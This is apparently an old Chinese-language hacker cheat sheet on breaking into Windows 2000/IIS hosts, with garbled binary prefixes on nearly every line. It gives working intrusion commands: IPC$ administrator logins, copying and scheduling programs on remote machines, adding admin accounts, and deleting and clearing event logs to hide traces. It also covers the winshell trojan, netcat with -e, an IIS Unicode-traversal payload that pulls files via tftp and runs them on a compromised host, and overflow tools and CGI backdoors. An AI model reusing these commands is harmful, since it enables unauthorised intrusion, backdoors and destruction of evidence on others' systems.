网管和黑客都必须知道的命令
�q�Xn��%c" 常用的几条NET命令:
zQV$!�%qR� Vd�jf
F&�q (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
%�AF~��K�i �^
R�U"v>� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
��"|gNNm�r �bT@�3fuL4 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
P"cc$lB~�I ���9���\0� (查看远程主机时间) net time \\IP地址
6(f�[<V�!r UW8b(b[-6b (定时启动某个程序) at \\IP地址 02:18 readme.exe
9mIq9rQ|*� w3a`G|���� (查看共享) net view \\IP地址
w[qWr@��
hvnZ
2x.?d (查看netbios工作组列表) nbtstat -A IP地址
RM|<(�k�q� >�t.2!Z_RQ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
5�lu6�20�o KcF2}+iM�� (这两条把自己增加到管理员组): net user 用户名 密码 /add
�xw�W[6A�h #6�[�FGM�� net localgroup Administrators 用户名 /add
& ;i�e+�/B q*SX.A>�YR (断开连接) net use \\IP地址\ipc$ /delete
,ic.b�
@u1 )wQ�R2$x~� 扫尾:
~�^2�Y*|{) ~N&j6wHg�# del C:\winnt\system32\logfiles\*.*
|
�y\�B*�P MS%xO�B*�6 del C:\winnt\ssytem32\config\*.evt
�Q|rrbx��b DI'wZy�SS^ del C:\winnt\system32\dtclog\*.*
NmthvKhH�� �N����J9H= del C:\winnt\system32\*.log
a*0g�d-e0@ m
j�C�6(?V del C:\winnt\system32\*.txt
L�N�ms�v�U v�[T5D���: del C:\winnt\*.txt
~M�6Q8Y�9� ~�Y<x�-)R� del C:\winnt\*.log
{e/Qs|�a
R '-p<E"#�4Z 一、netsvc.exe
��]�O3[T�e yk5-�@�q�o 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
X��!2/cgU7 ��U-6b�>�< netsvc /list \\IP地址
)zkk%mE/IM <�v&>&;>3� netsvc schedule \\IP地址 /query
�7rw}q~CE5 y���HT�8I� netsvc \\IP地址 schedule /start
�@]"���:3� US 9cuah1/ 二、OpenTelnet.exe
&EYO[�~D06 �?*zR�M?�* 远程启动主机的Telnet服务,并绑定端口到7878,例如:
|�d?0�ZA:z {�x4��0W0� OpenTelnet \\IP地址 用户名 密码 1 7878
m�*tmmP�4R /v��7U~i�5 然后就可以telnet到主机的7878端口,进入DOS方式下:
qd�6X�Kl\5 '9>z4G*�Td telnet IP地址 7878
xV @�X%E� {wi�w]@c8� 三、winshell.exe
!U>71�1$�� @5K/��z<p% 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
/P��N[�g~3 UbE*�x2�N� p Path (查看winshell主程序的路径信息)
<p�p��M�\$ =l�tT6of@o b reBoot (重新启动机器)
]e�@'9`G-' P(8zJk6h), d shutDown (关闭机器)
*�D�!�$gfa N%'=�el�4L s Shell (执行后你就会看到可爱的“C:\>”)
�*�aT3L#0( 'z0@|����a x eXit (退出本次登录会话,此命令并不终止winshell的运行)
LRW7_XY��z ��(?��Fz�{ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�y�xh8sA�Z Z�.Z�+cF�i 四、3389登陆器,GUI方式登录远程主机的
R_eKKi�@VH l� � 3�bo 五、elsave.exe
BFc=Gi�PnQ # kl?ww U 事件日志清除工具
�'kPc`)�\ �{]]�q�d!, elsave -s \\IP地址 -l "application" -C
�\^�o�r�l9 Dfgq�B3U�[ elsave -s \\IP地址 -l "system" -C
^��5x\�cR A6YkoY�g�C elsave -s \\IP地址 -l "security" -C
q|0�Lu��� v>CA��A"LH 执行后成功清除应用程序日志,系统日志,安全日志
Z%Q�[W�}iD NitWIj[�U; 六、hbulot.exe
:K�GUO{_u� G�]X72R?g� 开启win2kserver和winxp的3389服务
E+k#1c|�v$ i9+(gX(t� hbulot [/r]
#G�%[4.$n. 9ar+P�h@*� 使用/r表示安装完成后自动重起目标使设置生效。
TC;2K,.#�k ,rx?Ig}k�z 七、nc.exe(netcat.exe)
gTcLS|&��H �#?��-2f�{ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
. S4Xw2�MS o�hklLZ�oZ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
me"��}1REa %/N�B263Db 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
}w�^Hm3Y^& ^3�C8GzOsO 参数:
AAUFX�/}8P A
J<Sa=��� -e prog 程序重定向,一旦连接,就执行 [危险!!]
6��Ty;�m>j `3m7�b!0k -g gateway source-routing hop point[s], up to 8
�' ^L�|�}e /�@-�!JF#g -G num source-routing pointer: 4, 8, 12, ...
Ey7S���Qb� w'E&w)Z�]� -h 帮助信息
S)���Z�cH� h3U��| ~�h -i secs 延时的间隔
H=��O�/�w3 +��Z99��x# -l 监听模式,用于入站连接
�d��a�<B6! @."_XL7�4� -n 指定数字的IP地址,不能用hostname
��P�oTJ4z 6wK>SW)#&j -o file 记录16进制的传输
g�93-�2k, ;G_{$)P.o� -p port 本地端口号
CR3<�9=Lv> YQGVQ�[P�� -r 任意指定本地及远程端口
OO�Jg%y*H� BnJ�pC<xm -s addr 本地源地址
r�/o1a't; uL�| Wu�q� -u UDP模式
o6L��\39v_ hq�[;Q�F:B -v 详细输出——用两个-v可得到更详细的内容
}n�/��6�.% /Il�ve
U`E -w secs timeout的时间
gD`|N@W�$5 ���{}>s�0B -z 将输入输出关掉——用于扫描时
�i��[,9h�p 八、TFTPD32.EXE
5U�s$.��p� ���_D�<=Yo 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
4h%� G %>j |hHj7X�<?k http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
!7)�`� g i �gp@X(�d� 然后可以直接令文件运行:
t�gk] sQ�Y hc#Lni�R3$ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�o�3C7��JG %%d3M�->C} 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
C{Y0}ZrmlF 39Nz>Nu:�� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
U~h
f,Ox�i ppL*#/�jYt 一、一 Xscan命令行运行参数说明:
r2dU>U*:4� [�\|`C4@3a 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
\M$���e#^g =�zaf�{�0c 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
r�BY)rUDd4 ��MPa��F� xscan -file <主机列表文件名> <检测项目> [其他选项]
�`p qj��~s ~@Yi�wp\�" 其中<检测项目> 含义如下:
+r8:�t5:/I :'hc�&wk�` -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
7ns�n8W�N[ �barY13)$U -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
4�t�h*=�ku �]Q8[,HTG� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
(}!�xO?NA( [Q0�n-b,Q� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
!UPK�y$� irZMgRQAT� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
p"l �GR&b M�Z$x(Vcj [其他选项] 含义如下:
��st4WjX_Q R%��%Uw %` -v: 显示详细扫描进度
<vb%i0+b.^ &7�-ENg9 [ -p: 跳过Ping不通的主机
A�[7\!bq�5 ��p"'knZ�G -o: 跳过没有检测到开放端口的主机
U!y GZEU"[ ;,WI_i�P(w -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
